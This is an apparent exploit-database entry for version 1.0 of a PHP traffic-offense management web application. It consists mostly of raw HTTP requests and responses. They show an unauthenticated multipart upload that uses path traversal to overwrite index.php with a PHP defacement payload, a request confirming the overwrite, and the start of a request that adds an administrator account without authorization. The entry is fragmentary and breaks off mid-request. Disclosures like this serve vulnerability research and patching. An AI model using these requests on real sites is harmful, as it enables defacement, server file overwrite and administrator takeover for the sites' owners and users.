Exploits / Vulnerability Discovered : 2021-10-08 |
Type : webapps |
Platform : php
This exploit / vulnerability Online traffic offense management system 1.0 privilage escalation (unauthenticated) is for educational purposes only and if it is used you will do on your own risk!
# All requests can be sent by both an authenticated and a non-authenticated user
# The vulnerabilities in the application allow for:
* Reading any PHP file from the server
* Saving files to parent and child directories and overwriting files in server
* Performing operations by an unauthenticated user with application administrator rights
-----------------------------------------------------------------------------------------------------------------------
# Request to overwrite file index.php in main directory webapp
<?php
echo "Hacked other client files in this hosting!";
?>
-----------------------------329606699635951312463334027403--
# New file have extention as this write filename="fuzzdb.php"
# New file have name and locate 5/../../../index we can save file in other directory ;)
# Line must start digit
# We can rewrite config files
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:38:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Access-Control-Allow-Origin: *
Content-Length: 20
Connection: close
Content-Type: text/html; charset=UTF-8
{"status":"success"}
-----------------------------------------------------------------------------------------------------------------------
# Request to read file index.php again
GET /traffic_offense/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
HTTP/1.1 200 OK
Date: Thu, 07 Oct 2021 10:42:17 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23
X-Powered-By: PHP/7.4.23
Access-Control-Allow-Origin: *
Content-Length: 42
Connection: close
Content-Type: text/html; charset=UTF-8
Hacked other client files in this hosting!
-----------------------------------------------------------------------------------------------------------------------
## Example 4 - Performing operations by an unauthenticated user with application administrator rights
# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable
# Request adding new admin user to application by sending a request by an authorized user
POST /traffic_offense/classes/Users.php?f=save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685
Content-Length: 949
Origin: http://localhost
Connection: close
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin